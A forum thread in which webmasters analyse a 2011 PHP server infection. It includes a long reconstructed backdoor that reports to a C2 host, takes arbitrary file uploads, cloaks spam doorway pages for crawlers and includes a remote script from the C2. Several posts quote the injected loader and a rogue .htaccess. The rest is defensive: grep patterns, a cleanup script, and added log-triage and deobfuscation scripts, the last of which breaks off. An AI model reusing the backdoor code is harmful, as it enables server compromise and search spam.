  1. #1
    SitePoint Member (Join Date: Mar 2011, Posts: 2)

    how to remove the virus on my server

    Hi All

    My server is infected by a virus, I think. It inserts a line at the end of the code like below, but when I check the footer code it does not show; it only shows in the page source.
    Please help me with how I can remove it.

    </body>
    </html><img heigth="1" width="1" border="0" src="http://imgaaa.net/t.php?id=8999982">


    <snip/>
    Last edited by Mittineague; Apr 2, 2011 at 19:20. Reason: Don't link to infected sites please

  2. #2
    SitePoint Member (Join Date: Mar 2011, Posts: 2)
    Hello, anyone for help?

  3. #3
    Community Advisor (Join Date: Nov 2006, Location: UK, Posts: 2,547)
    This sort of code injection has been covered many times on this forum before, e.g. look at some of these posts. There's plenty of information amongst them on likely causes and cures.

    http://www.sitepoint.com/forums/sear...archid=4616413

  4. #4
    SitePoint Evangelist (Join Date: Mar 2006, Posts: 466)
    The link is dead. What was the search term?

    Brandon

  5. #5
    SitePoint Member (Join Date: Apr 2011, Posts: 3)
    The same happened to me on all my VPSs - here are my findings so far:

    The source seems to be an infection by a Trojan - probably Win32/Kryptik. In a first step you will see an injection of the above type in all index.html and index.php files. The ID number varies. Look out for less obvious index.* files in subdirectories.

    In a second step (in my case about a day later) the real attack happens:
    you will find files like 42.php or 23.php - always two digits - and a bogus .htaccess. The .htaccess looks like this:

    Code:
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule ^(.*)$ /wp-admin/26.php?q=$1 [L]
    </IfModule>
    The malicious 26.php (or whatever number it may have) uncompresses binary code:

    Code:
    <? eval(gzuncompress(base64_decode('eNqdWNtuGkkQ/Zm...
    I am only a couple of hours into the investigation of this attack, so all I know is a bit superficial at this point. I am more than happy to exchange thoughts and info about this.

    Cheers

    Sven

    PS: I saw some forums pointing to the lizamoon attack - but so far I have my doubts that this is actually connected.

  6. #6
    Community Advisor (Join Date: Nov 2006, Location: UK, Posts: 2,547)
    Do a search for 'gumblar' in all forums

  7. #7
    SitePoint Member (Join Date: Apr 2011, Posts: 3)
    Quote Originally Posted by EastCoast View Post
    Do a search for 'gumblar' in all forums
    Excuse me, but from what we are observing we are not dealing with "Gumblar" or a variant. There are similarities, but only remote ones.

    What we are seeing is a 2 stage attack:

    stage 1: injection of HTML code (nothing executable!!) - the code seems to serve only to notify the bad guys of the hacked URL.

    stage 2: about a day later I see uploads of malicious code.

    To me it looks like an exploitation of the Win32/Kryptik Trojan (aka TR/Crypt.XPACK.Gen).

    What bothers me is the missing link - I don't really understand why they do this. If the Trojan sends the usernames and passwords for FTP access, why do they need to inject HTML code to pass an ID number? Why don't they inject malicious code right away, or FTP it there?

    Did anyone decode the binary code yet?

    Sven

  8. #8
    Community Advisor (Join Date: Nov 2006, Location: UK, Posts: 2,547)
    I was answering the OP, not you. The question is how did they manage to inject the code in the first place, this is what matters. The secondary payload, and what it decodes to (as it happens a trivial task) won't close the original point of entry.

  9. #9
    SitePoint Wizard Crazybanana (Join Date: Mar 2003, Location: In tha fruit cellar, Posts: 1,379)
    Now I can't see the code as it is gone... What I can see is that the iframe is linking to another domain, and this makes it look similar to some other threats - a trojan has infected a PC - it steals FTP credentials - installs a backdoor/shell - injects code which links to another domain which tries to exploit a known vulnerability in Adobe PDF and/or SWF to execute arbitrary code...

    These kinds of attacks are poorly detected and quite successful.

    It might be Kryptik or some similar trojan, so clean your PC, your files, your server and change passwords.


  10. #10
    SitePoint Member (Join Date: Apr 2011, Posts: 9)
    A client of mine had the same.

    Do a malware scan, and do not use CuteFTP or any other popular FTP program. All the passwords you had are now stolen. Clean your PC and request new FTP passwords for all your sites, and use KeePass to store them.

    Here is the disassembled file (n.php), which makes calls to http://bestnetblog.net/logdomain.php?q=alcobro to log the trojan activity.

    Files known to be infected:
    ------------
    n.php
    /.log/ this folder is sometimes created, delete it.
    .htaccess will be overwritten, check it.
    check every index.php .html for the img tag.
    ------------

    Code:
    <?php
    // Reconstructed from the disassembly as it was pasted: the dump had lost every "$",
    // most quote marks and the "<" / ">" characters (they came through as HTML entities),
    // and long lines were broken up. Those are restored here, the round(0+a+b+...)
    // arithmetic is folded to the constant it evaluates to, and the numeric curl option
    // IDs are annotated. Portions the dump does not contain are marked
    // "[missing in the dump]" and are not reconstructed.

    error_reporting(0);
    if (isset($_GET['q'])) {
        // the trailing "*" makes this pattern match any string, so the die is never reached
        if (!preg_match("/^([a-z0-9-.)(&=]*)/i", $_GET['q'])) {
            die;
        }
    }

    if (extension_loaded('curl') && function_exists('curl_init') && function_exists('curl_exec')) {
        function l__0($_0) {                                 // HTTP fetch helper
            $_1 = curl_init();
            curl_setopt($_1, 10002, $_0);                    // CURLOPT_URL
            curl_setopt($_1, 42, 0);                         // CURLOPT_HEADER
            curl_setopt($_1, 19913, 1);                      // CURLOPT_RETURNTRANSFER
            curl_setopt($_1, 52, 1);                         // CURLOPT_FOLLOWLOCATION
            curl_setopt($_1, 13, 20);                        // CURLOPT_TIMEOUT
            curl_setopt($_1, 3, 80);                         // CURLOPT_PORT
            curl_setopt($_1, 10018, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 2.0.50727; InfoPath.1)'); // CURLOPT_USERAGENT
            $_2 = curl_exec($_1);
            $_3 = curl_getinfo($_1, 2097154);                // CURLINFO_HTTP_CODE
            if ($_3 >= 400) $_2 = false;
            curl_close($_1);
            return $_2;
        }
    } else if (function_exists('file_get_contents')) {
        function l__0($_0) {
            return file_get_contents($_0);
        }
    } else die('not work');

    // Per-host working directory .log/<host>/ (world-writable); the C2 host lives in xmlrpc.txt
    $_4 = preg_replace('/^www\./', '', $_SERVER['HTTP_HOST']);
    @mkdir('.log/');
    @chmod('.log/', 511);                                    // 0777
    @mkdir('.log/' . $_4);
    @chmod('.log/' . $_4, 511);                              // 0777
    $_5 = '.log/' . $_4 . '/xmlrpc.txt';
    if (@fopen($_5, 'r')) {
    } else {
        $_6 = fopen('.log/' . $_4 . '/xmlrpc.txt', 'w+');
        fwrite($_6, 'bestnetblog.net');                      // default C2 host
        fclose($_6);
    }

    // ?q=alcobro : activation. Drops the .htaccess that routes every URL that is not a real
    // file or directory into this script, then reports the hacked host to <C2>/logdomain.php
    if ($_GET['q'] == 'alcobro') {
        $_5 = '.htaccess';
        if (file_exists($_5)) {
            $_7 = 'disable';
        } else {
            $_8 = "RewriteEngine On\n"
                . "RewriteCond %{REQUEST_FILENAME} !-f\n"
                . "RewriteCond %{REQUEST_FILENAME} !-d\n"
                . "RewriteRule ^(.*) " . $_SERVER['SCRIPT_NAME'] . "?q=\$1 [L]\n";
            $_9 = fopen('.htaccess', 'w+');
            fwrite($_9, $_8);
            fclose($_9);
            $_7 = 'enable';
        }
        $curlit = file_get_contents('.log/' . $_4 . '/xmlrpc.txt');
        $_11 = 'http://' . $curlit . '/logdomain.php?q=' . $_SERVER['HTTP_HOST'];
        $_12 = l__0($_11);
        echo $_12 . $_7;
        die;
    }

    // ?dom100500=<host> : switch the C2 host
    if ($_GET['dom100500'] != '') {
        $_13 = fopen('.log/' . $_4 . '/xmlrpc.txt', 'w+');
        fwrite($_13, $_GET['dom100500']);
        fclose($_13);
        echo '100500ok';
        die;
    }

    // ?up100500=1 : arbitrary file upload into the script's directory
    if ($_GET['up100500'] != '') {
        $_14 = '';
        $_14 = $_14 . basename($_FILES['uploaded']['name']);
        $_15 = 1;
        if (move_uploaded_file($_FILES['uploaded']['tmp_name'], $_14)) {
            echo 'up100500';
        }
        echo '<form enctype="multipart/form-data" method="POST"><input name="uploaded" type="file"><input type="submit" value="U"></form>';
        die;
    }

    // Doorway-page generator: scrapes Google for the keyword in ?q=, feeds the snippets to a
    // Markov-chain text generator (class l__2), adds Google Images results and Google Suggest
    // keywords as links, and plants a <REPLACEME> marker in a copy of the site's own page so
    // the generated text is served inside the victim's layout.
    function l__1($_16) {
        $_4 = preg_replace('/^www\./', '', $_SERVER['HTTP_HOST']);
        $_17 = isset($_GET['q']) ? str_replace('/', '', urldecode($_GET['q'])) : FALSE;
        $_18 = str_replace('-', '+', $_17);
        $_18 = str_replace('_', '+', $_17);
        $_19 = 'http://www.google.com/search?hl=en&as_q=' . $_18 . '&num=100&as_qdr=all';
        $_20 = l__0($_19);
        preg_match_all('#<div class="s">(.*)<br>#U', $_20, $_21);
        $_22 = array();
        for ($_23 = 0; $_23 <
        /* [missing in the dump: the rest of the snippet-cleaning loop that builds $_25, and
           the start of class l__2, whose constructor splits the text into words and records,
           for every word, the words that follow it in $this->_26] */
                    for (/* ... */; $_32 <= $_31; ++$_32) {
                        $_33 = $_28[$_30][$_32];
                        $this->_26[$_33][] = $_28[$_30][$_32 + 1];
                    }
                }
                $_34 = array_keys($this->_26);
                foreach ($_34 as $_17) {
                    $this->_26[$_17] = array_unique($this->_26[$_17]);
                }
            }

            function l__3($_35) {                            // emit roughly $_35 words of Markov text
                $_36 = 0;
                for ($_30 = 0; $_36 < $_35; ++$_30) {
                    $_37 = array_rand($this->_26);
                    $_38 = mt_rand(5, 12);                   // words per sentence
                    for ($_32 = 0; $_32 <
        /* [missing in the dump: the inner loop body up to the next-word pick] */
                        $_40 = $this->_26[$_37][mt_rand(0, count($this->_26[$_37]) - 1)];
                        if ($_40 == '') $_40 = array_rand($this->_26);
                        $_37 = $_40;
                        if ($_37 == '') break 2;
                    }
                }
                foreach ($_39 as $_41) {                     // tidy each generated sentence
                    $_42 = count($_41);
                    if ($_42 <= 2) continue;
                    if (strlen($_41[$_42 - 1]) < 4) unset($_41[$_42 - 1]);
                    $_41[$_42 - 2] = rtrim($_41[$_42 - 2], ',:;');
                    $_41[$_42 - 1] = rtrim($_41[$_42 - 1], ',:;');
                    $_43 .= ucfirst(implode(' ', $_41)) . '. ';
                }
                $_43 = str_replace(' .', '.', $_43);
                return $_43;
            }
        }

        $_27 = $_25;
        $_44 = new l__2($_27);
        $_45 = $_44->l__3(1400);
        $_45 = preg_replace('/[^a-zA-Z\., -]+?/', '', $_45);
        $_46 = isset($_GET['q']) ? str_replace('/', '', urldecode($_GET['q'])) : FALSE;
        $_46 = str_replace('-', ' ', $_46);
        $_46 = str_replace('_', ' ', $_46);
        $_47 = str_replace(' ', '+', $_46);
        if ($_GET['page'] != 1) {
            $_48 = '&start=' . ($_GET['page'] - 1) * 21;
        }
        $_49 = l__0('http://images.google.com/images?q=' . $_47 . '&lr=lang_en' . $_48);
        preg_match_all('/href="?\/imgres\?imgurl=([^\&]+)/', $_49, $_50);
        $_51 = array();
        for ($_32 = 0; $_32 <
        /* [missing in the dump: the image-link loop; $_53 is the link prefix, and the loop
           below links the doorway pages already cached as .log/<host>/<keyword>.html] */
                if (/* [condition lost] */ $_54) break;
                preg_match_all('#^\.log/' . $_4 . '/(.*).html#i', $_58, $_59);
                $_57 .= '<a href="' . $_53 . $_59[1][0] . '" title="'
                    . str_replace('_', ' ', str_replace('-', ' ', $_59[1][0])) . '">'
                    . str_replace('_', ' ', str_replace('-', ' ', $_59[1][0])) . '</a>, ';
                $_56++;
        }
        // related keywords from Google Suggest, each linked to another doorway page
        $_60 = l__0('http://clients1.google.com/complete/search?hl=en&ds=i&q=' . str_replace(' ', '%20', $_46));
        preg_match_all('|\["([^"]+)",|si', $_60, $_61, 1);
        $_62 = 0;
        array_shift($_61[1]);
        foreach ($_61[1] as $_63) {
            $_64 .= "<a href='" . $_53 . str_replace(' ', '-', $_63) . "' title='" . $_63 . "'>" . $_63 . '</a>, ';
            if ($_62++ > 11) break;
        }
        $_65 = $_53 . $_GET['q'];
        $_66 = '<
        /* [missing in the dump: the body markup ($_66) and the start of the template capture
           that fetches the site's own page into $_71 and splits it into blocks $_73] */
                for (/* ... */; $_32 < $_72; $_32++) {
                    // pick the longest block that contains no <script>; the marker goes after it
                    if ((preg_match('/\<script/imsU', $_73[0][$_32]) == 0) AND (strlen($_73[0][$_32]) > $_74)) {
                        $_74 = strlen($_73[0][$_32]);
                        $_75 = $_32;
                    }
                }
                $_71 = str_ireplace($_73[0][$_75], $_73[0][$_75] . '<REPLACEME>', $_71);
                $_76 = fopen($_70, 'w');                     // $_70 = .log/<host>/shab100500.txt
                fputs($_76, $_71);
                fclose($_76);
        }
        // (a short string literal between $_57 and $_69 was lost in the dump)
        $_77 = '<h1>' . strtoupper($_46) . $_78 . '</h1>' . $_64 . $_57 . $_69 . '<p>' . $_66 . '</p>';
        return $_77;
    }

    // Cached wrapper around l__1: one .log/<host>/<keyword>.html<page> file per doorway page
    function l__4($_79) {
        $_4 = preg_replace('/^www\./', '', $_SERVER['HTTP_HOST']);
        $_80 = '.log/' . $_4 . '/' . $_79 . '.html' . $_GET['page'];
        if (@file_exists($_80)) return @file_get_contents($_80);
        $_16 = str_replace('-', ' ', $_79);
        $_16 = str_replace('+', ' ', $_79);
        $_81 = l__1($_16);
        $_82 = @fopen($_80, 'w');
        @fwrite($_82, $_81);
        @fclose($_82);
        return $_81;
        $_83 = file_get_contents($_80);                      // unreachable
    }

    // Cloaking: visitors whose first two octets match one of these search-engine crawler
    // ranges get the doorway page; everybody else falls through to the redirect logic below.
    $_84 = array('66.228.', '67.195.', '68.142.', '66.196.', '68.180.', '72.30.', '74.6.', '66.94.', '66.163.', '64.75.', '216.32.', '66.163.', '65.52.', '65.53.', '65.54.', '65.55.', '66.249.', '66.102.', '209.85.', '72.14.', '74.125.', '64.68.', '64.233.', '216.239.', '173.194.', '91.184.', '94.231.', '127.0.', '31.43.');
    $_85 = getenv('REMOTE_ADDR');
    $_86 = explode('.', $_85);
    for ($_32 = 0; ; $_32++) {
        if ($_84[$_32] == NULL) break;
        $_87 = explode('.', $_84[$_32]);
        if ($_87[0] == $_86[0] && $_87[1] == $_86[1]) {
            if ($_GET['q'] != '') {
                $_70 = '.log/' . $_4 . '/shab100500.txt';    // captured copy of the site's own page
                if (filesize($_70) < 800) {
                    $_71 = '<head><title>title</title></head><body><REPLACEME></body></html>';
                } else {
                    $_71 = file_get_contents($_70);
                }
                $_88 = basename($_GET['q']);
                $_46 = $_GET['q'];
                $_46 = str_replace('-', ' ', $_46);
                $_46 = str_replace('.html', '', $_46);
                $_71 = preg_replace('/<title>(.*)<\/title>/imsU',
                    '<title>' . ucwords($_46) . '</title><meta name="googlebot" content="noarchive">', $_71);
                $_71 = str_ireplace('<REPLACEME>', l__4($_88), $_71);
                print $_71;
                exit;
            }
        }
    }

    // Human visitors arriving from a search engine (or using Opera) get a <script> fetched
    // from <C2>/badcompany.php and cached in .log/<host>/iog.txt for 30 minutes.
    if ($_GET['q'] != '') {
        if (strpos($_SERVER['HTTP_USER_AGENT'], 'Opera') !== false) {
            echo '<script>';
            include('.log/' . $_4 . '/iog.txt');
            echo '</script>';
            die;
        }
        if (strpos($_SERVER['HTTP_REFERER'], 'site%') > 0) {
        } else {
            if (strpos($_SERVER['HTTP_REFERER'], 'google.') || strpos($_SERVER['HTTP_REFERER'], 'yahoo.') || strpos($_SERVER['HTTP_REFERER'], 'bing.') > 0) {
                $_89 = 30 * 60;
                $_90 = '.log/' . $_4 . '/iog.txt';
                if (!file_exists($_90) || time() - filemtime($_90) > $_89) {
                    $curlit = file_get_contents('.log/' . $_4 . '/xmlrpc.txt');
                    $_91 = 'http://' . $curlit . '/badcompany.php?q=' . $_4 . $_SERVER['SCRIPT_NAME'];
                    $_2 = l__0($_91);
                    $_92 = fopen('.log/' . $_4 . '/iog.txt', 'w+');
                    fwrite($_92, $_2);
                    fclose($_92);
                }
                echo '<script>';
                include('.log/' . $_4 . '/iog.txt');
                echo '</script>';
                die();
            }
        }
    }

    // Anyone else is bounced to the site's front page
    header('Location: http://' . $_SERVER['HTTP_HOST']);
    ?>
    Grep:
    ----------------------
    'imgaaa.net/t.php'
    'eval(gzuncompress('
    ----------------------

    Attack log example:
    ----------------------
    91.200.240.10 - - [02/Apr/2011:05:30:48 +0200] "GET /11.php?q=alcobro

    This IP is used to monitor activity; it's probably also hacked.
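Added example (not from the thread or any poster): a Python triage script for web-server access logs that flags the control requests the disassembled n.php above answers to (q=alcobro, dom100500, up100500), any hit on a two-digit or n.php path, doorway pages served to the crawler IP ranges the shell hard-codes, and search-engine visitors it routes through itself. The log lines are constructed (203.0.113.x and 198.51.100.x are documentation ranges, the keyword is made up); the crawler prefixes are copied from the IP list in the dump.

```python
# Added example, not code from the thread. Triage combined-format access logs
# for traffic to the n.php / NN.php shell described above.
import re
from dataclasses import dataclass, field
from typing import Dict, Iterable, List, Optional
from urllib.parse import parse_qs, urlsplit

# Combined log format. Status, size, referer and user-agent are optional so a
# line cut off after the request (as in the thread's excerpt) still parses.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*"?'
    r'(?: (?P<status>\d{3}|-) (?P<size>\d+|-))?'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)
SHELL_PATH = re.compile(r"/(?:\d{2}|n)\.php$")           # 11.php, 26.php, n.php ...
CONTROL_PARAMS = {                                        # handled by the dump above
    "q": "alcobro",      # activation: write .htaccess, report host to C2 logdomain.php
    "dom100500": None,   # overwrite the C2 host kept in .log/<host>/xmlrpc.txt
    "up100500": None,    # arbitrary file upload
}
# First two octets the shell treats as search-engine crawlers (copied from the dump).
CRAWLER_PREFIXES = {
    "66.228", "67.195", "68.142", "66.196", "68.180", "72.30", "74.6", "66.94",
    "66.163", "64.75", "216.32", "65.52", "65.53", "65.54", "65.55", "66.249",
    "66.102", "209.85", "72.14", "74.125", "64.68", "64.233", "216.239",
    "173.194", "91.184", "94.231", "127.0", "31.43",
}
SEARCH_REFERER = re.compile(r"https?://[^/]*\b(?:google|yahoo|bing)\.", re.I)


@dataclass
class Finding:
    ip: str
    ts: str
    request: str
    reasons: List[str] = field(default_factory=list)


def parse_line(line: str) -> Optional[Dict[str, Optional[str]]]:
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(rec: Dict[str, Optional[str]]) -> List[str]:
    """Return the reasons a parsed request looks like traffic to the shell."""
    url = urlsplit(rec["path"] or "")
    params = parse_qs(url.query, keep_blank_values=True)
    reasons: List[str] = []
    is_shell = bool(SHELL_PATH.search(url.path))
    if is_shell:
        reasons.append("request to two-digit/n.php shell path")
    for name, value in CONTROL_PARAMS.items():
        if name in params and (value is None or value in params[name]):
            reasons.append("control parameter %s" % (name if value is None else f"{name}={value}"))
    if is_shell and "q" in params:
        prefix = ".".join((rec["ip"] or "").split(".")[:2])
        if prefix in CRAWLER_PREFIXES:
            reasons.append("doorway page served to crawler IP range")
        elif rec.get("referer") and SEARCH_REFERER.search(rec["referer"]):
            reasons.append("search-engine visitor routed through shell")
    return reasons


def triage(lines: Iterable[str]) -> List[Finding]:
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            findings.append(Finding(rec["ip"], rec["ts"], rec["path"], reasons))
    return findings


# Constructed sample lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [02/Apr/2011:05:30:48 +0200] "GET /11.php?q=alcobro HTTP/1.1" 200 23 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [02/Apr/2011:05:31:02 +0200] "POST /11.php?up100500=1 HTTP/1.1" 200 412 "-" "Mozilla/4.0"',
    '66.249.71.15 - - [03/Apr/2011:11:02:17 +0200] "GET /11.php?q=cheap-flights HTTP/1.1" 200 8123 "-" "Mozilla/5.0 (compatible; Googlebot/2.1)"',
    '198.51.100.4 - - [03/Apr/2011:11:09:41 +0200] "GET /wp-admin/26.php?q=cheap-flights HTTP/1.1" 302 - "http://www.google.com/search?q=cheap+flights" "Mozilla/5.0"',
    '198.51.100.9 - - [03/Apr/2011:11:10:00 +0200] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [04/Apr/2011:02:12:55 +0200] "GET /11.php?q=alcobro',   # cut off like the thread's excerpt
]

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f.ip, f.ts, f.request, "->", "; ".join(f.reasons))
```

Feed it the real log with `triage(open("access.log"))`; the q=alcobro hit gives the activation time, which is the baseline to compare file modification times against.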

  11. #11
    SitePoint Member (Join Date: Apr 2011, Posts: 9)
    Quote Originally Posted by Sventy View Post
    What bothers me is the missing link - I don't really understand why they do this. If the Trojan sends the usernames and passwords for FTP access, why do they need to inject HTML code to pass an ID number? Why don't they inject malicious code right away, or FTP it there?

    Did anyone decode the binary code yet?

    Sven
    They seem to do it for SEO scores; that's what I deduce from the disassembly.

  12. #12
    SitePoint Member (Join Date: Apr 2011, Posts: 3)
    Has anyone come up with a tool that will remove the <img> tags?

    It really sucks doing this manually over all sites/folders...

  13. #13
    SitePoint Member (Join Date: Apr 2011, Posts: 9)
    If you have an editor with find/replace functionality like Dreamweaver, you can RegEx it out. Dreamweaver can replace parts in files in a complete folder, with RegEx functionality, so it's useful.

    I did this:



    Find:
    ----
    imgaaa.net/t.php\?id=.*?">

    Replace with:
    ------------
    'FOOBAR'

    Then run once again for removal:

    Find:
    -----
    <img heigth="1" width="1" border="0" src="http://FOOBAR

    Replace:
    -------

    //empty nothing.


    Took 10 seconds for a whole server copy with hundreds of files.


    - Good luck!

  14. #14
    SitePoint Member (Join Date: Apr 2011, Posts: 9)
    Okay, I was just in a coding mood and wrote a clean-up tool for you in PHP. It does work here, I just tested it. But you might want to be careful: it's a recursive scanner that deletes the n.php files and modifies existing files containing the image.

    Code:
    <?php

    $log = "";

    // Recursively walk $start_dir: delete files carrying the eval(gzuncompress( payload
    // and strip the imgaaa.net tracking image from .php/.html/.htm files.
    function fixgumblar($start_dir) {
        global $log;   // without this the function wrote to a local $log and nothing was ever reported

        $file_type = '/\.(php|html?)$/i';   // anchored to the extension, not any part of the path
        $dirlist = opendir($start_dir);
        if ($dirlist === false) {
            $log .= $start_dir . " could not be opened\r\n";
            return false;
        }
        while (($file = readdir($dirlist)) !== false) {   // !== false: an entry named "0" must not end the loop
            if ($file == '.' || $file == '..') {
                continue;
            }
            $newpath = $start_dir . '/' . $file;
            if (is_dir($newpath)) {
                fixgumblar($newpath);
                continue;
            }
            if (!preg_match($file_type, $newpath)) {
                continue;
            }
            $inputline = file_get_contents($newpath);   // fread(filesize()) warned on empty files
            if ($inputline === false) {
                continue;
            }
            if (stristr($inputline, 'eval(gzuncompress(') !== FALSE) {
                unlink($newpath); // remove the n.php / NN.php files!
                $log .= $newpath . " REMOVED! \r\n";
                continue;
            }
            $count = 0;
            $inputline = preg_replace('/<img heigth="1" width="1" border="0" src="http:\/\/imgaaa.net\/t.php\?id=.*?">/', '', $inputline, -1, $count);
            if ($count) {
                file_put_contents($newpath, $inputline);
                $log .= $newpath . " EDITED\r\n";
            }
        }
        closedir($dirlist);
        return true;
    }

    fixgumblar('./test');  // provide start folder, no trailing slash!

    echo $log;

    ?>
    Here are the test files, which also contain parts of the corrupt files, so please delete after use:

    http://www.easy-share.com/1914559087/try.rar

    alternative download:

    http://www.filedropper.com/try_1

    - Good luck!

  15. #15
    SitePoint Member (Join Date: Apr 2011, Posts: 9)
    Likely cause(s):

    -----------------------------------------------------------------------------------
    c:\WINDOWS\system32\cryptnet32.dll (Trojan.Tracur) -> Delete on reboot.
    c:\documents and settings\administrator\my documents\downloads\messenger.exe (Trojan.Dropper) -> Quarantined and deleted successfully.
    c:\documents and settings\administrator\local settings\temp\yme3iala.exe (Malware.Packer) -> Quarantined and deleted successfully.
    c:\documents and settings\administrator\local settings\temp\_CA.tmp (Trojan.Dropper) -> Quarantined and deleted successfully.
    c:\WINDOWS\system32\crt.dat (Malware.Trace) -> Quarantined and deleted successfully.
    c:\WINDOWS\system32\cryptnet32.dll (Trojan.Tracur) -> Delete on reboot.
    -----------------------------------------------------------------------------------

  16. #16
    SitePoint Member (Join Date: Apr 2011, Posts: 9)
    Since last week more reports have been dripping in from more clients, so beware, we might have a zero-day on our hands. Our systems and our clients' systems are updated every single day. Suggestion: disable Java and Flash, and disable scripting in PDF readers.

    Additional info for (future) reference:
    -----------------------------------

    c:\WINDOWS\system32\dll.dll <- might be infected too, based on further reports.

    Propagation evidence
    --------------------

    Due to one of the following issues in respective order:

    1. - Malicious PDF file (likely: found trojanized PDF on client PC)
    2. - Java Applet (likely: found corrupt web cache with malware packer )
    3. - Flash exploit (not likely, possible yet.)
    4. - Media file (wmv, codec, not likely.)

  17. #17
    SitePoint Member (Join Date: Apr 2011, Posts: 1)
    We had this appear on our client servers yesterday too. The imgaaa.net link was added to a few files (also a functions.php file under WordPress, so this is not limited to just index.php).

    The FTP log showed that the file was uploaded from an IP tracked to India.

    We are still in the process of trying to find out how many sites were affected and what was the entry point. All computers related are being scanned.

    Has anyone got any more info on this vulnerability / point of entry? Even Google can't seem to find any thread anywhere with conclusive data, just a ton of threads and pages from the last week or so describing the problem around the web.

    It doesn't really help to just fix the servers if we still have a trojan / keylogger roaming free somewhere.

  18. #18
    SitePoint Member (Join Date: Apr 2011, Posts: 9)
    I disassembled the code, had a look at all date changes on files, and nothing else besides the above is modified/added. If it is, you might have another version of it, or something completely different.

    The complete disassembled code: #1794541 - Pastie

  19. #19
    SitePoint Member (Join Date: Apr 2011, Posts: 1)
    Hi..

    Special thanks to "unknownimous", you're good. This big malware script caused the same problem on my client's site. I was trying to decode this code but I was unsuccessful, and thanks for your solutions for this malware. Can you tell me how to decode this code? It's a very interesting part.

    hxxp://malsite1 and hxxp://malsite2 are sister sites making high traffic through Google. They are targeting high-traffic sites, hacking them and then uploading the virus code. Whenever a visitor searches for a query with your relevant keyword, Google shows your site in the results; at that time this script chains the search string to what they need, and they make big traffic.

    Please tell me how to decode this code.

    my id : <snip/>
    Last edited by Mittineague; Apr 27, 2011 at 12:56. Reason: Please keep personal info private

  20. #20
    SitePoint Member (Join Date: Apr 2011, Posts: 9)
    I'm glad to help out, and hope it will be useful, since I know what a massive pain it can be once such an attack has happened.

    I disassembled it by using var_dump($code) in PHP, then looking at the arrays and running a replacement function, then another round of var_dump(), until you get what's above. It can also be automated through a 'PHP Bytecode Disassembler', somewhere on Google for download.
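For readers asking how the eval(gzuncompress(base64_decode('...'))) wrappers in posts #5, #7 and #19 can be decoded, here is an added example (not the poster's var_dump method and not code from the thread) that peels the layers statically in Python: PHP's gzuncompress is zlib format and gzinflate is raw deflate, so no PHP interpreter and no eval is involved. It also folds the round(0+a+b+...) arithmetic seen in the dump back to its constants and names the numeric curl option IDs. The sample payload is constructed by wrapping a harmless snippet the same way; the decoder map and the constant table are assumptions limited to the functions and IDs that appear in this thread.

```python
# Added example, not code from the thread. Static layer-peeler for the
# eval(gzuncompress(base64_decode('...'))) wrappers used by the dropped NN.php files.
import base64
import math
import re
import zlib
from typing import Callable, Dict, Tuple

LAYER_RE = re.compile(
    r"eval\s*\(\s*(?P<chain>(?:(?:gzuncompress|gzinflate|base64_decode)\s*\(\s*)+)"
    r"(?P<q>['\"])(?P<blob>[^'\"]*)(?P=q)\s*\)+\s*;?",
    re.S,
)
# Assumed mapping from the PHP decoder names to their Python equivalents.
DECODERS: Dict[str, Callable[[bytes], bytes]] = {
    "base64_decode": base64.b64decode,
    "gzuncompress": zlib.decompress,                  # PHP gzuncompress == zlib format
    "gzinflate": lambda b: zlib.decompress(b, -15),   # PHP gzinflate == raw deflate
}
ROUND_RE = re.compile(r"round\(\s*0(?:\s*\+\s*\d+(?:\.\d+)?)*\s*\)")
CURL_SETOPT_RE = re.compile(r"(curl_setopt\(\s*\$\w+\s*,\s*)(\d+)")
CURL_GETINFO_RE = re.compile(r"(curl_getinfo\(\s*\$\w+\s*,\s*)(\d+)")
# Only the IDs that occur in the dump above.
CURLOPT = {10002: "CURLOPT_URL", 42: "CURLOPT_HEADER", 19913: "CURLOPT_RETURNTRANSFER",
           52: "CURLOPT_FOLLOWLOCATION", 13: "CURLOPT_TIMEOUT", 3: "CURLOPT_PORT",
           10018: "CURLOPT_USERAGENT"}
CURLINFO = {2097154: "CURLINFO_HTTP_CODE"}


def peel(src: str, max_depth: int = 20) -> Tuple[str, int]:
    """Decode nested eval(...) wrappers innermost-first; returns (plain source, layers removed)."""
    depth = 0
    while depth < max_depth:
        m = LAYER_RE.search(src)
        if not m:
            break
        names = re.findall(r"[a-z0-9_]+", m.group("chain"))   # outer -> inner
        data = m.group("blob").encode("latin-1")
        for name in reversed(names):                          # innermost decoder runs first
            data = DECODERS[name](data)
        # The decoded text is what eval() would have run; keep whatever surrounds the wrapper.
        src = src[:m.start()] + data.decode("latin-1") + src[m.end():]
        depth += 1
    return src, depth


def php_round(x: float) -> int:
    """PHP round() rounds half away from zero (Python's round() is banker's rounding)."""
    return int(math.floor(x + 0.5)) if x >= 0 else -int(math.floor(-x + 0.5))


def fold_round(src: str) -> str:
    """Replace round(0+a+b+...) with the integer it evaluates to."""
    def repl(m):
        total = sum(float(t) for t in re.findall(r"\d+(?:\.\d+)?", m.group(0)))
        return str(php_round(total))
    return ROUND_RE.sub(repl, src)


def name_curl_constants(src: str) -> str:
    src = CURL_SETOPT_RE.sub(lambda m: m.group(1) + CURLOPT.get(int(m.group(2)), m.group(2)), src)
    return CURL_GETINFO_RE.sub(lambda m: m.group(1) + CURLINFO.get(int(m.group(2)), m.group(2)), src)


def deobfuscate(src: str) -> Tuple[str, int]:
    plain, depth = peel(src)
    return name_curl_constants(fold_round(plain)), depth


def build_sample(inner: str, layers: int = 2) -> str:
    """Constructed test input: wrap harmless PHP the same way the dropped NN.php files are wrapped."""
    src = inner
    for _ in range(layers):
        blob = base64.b64encode(zlib.compress(src.encode("latin-1"))).decode("ascii")
        src = "eval(gzuncompress(base64_decode('%s')));" % blob
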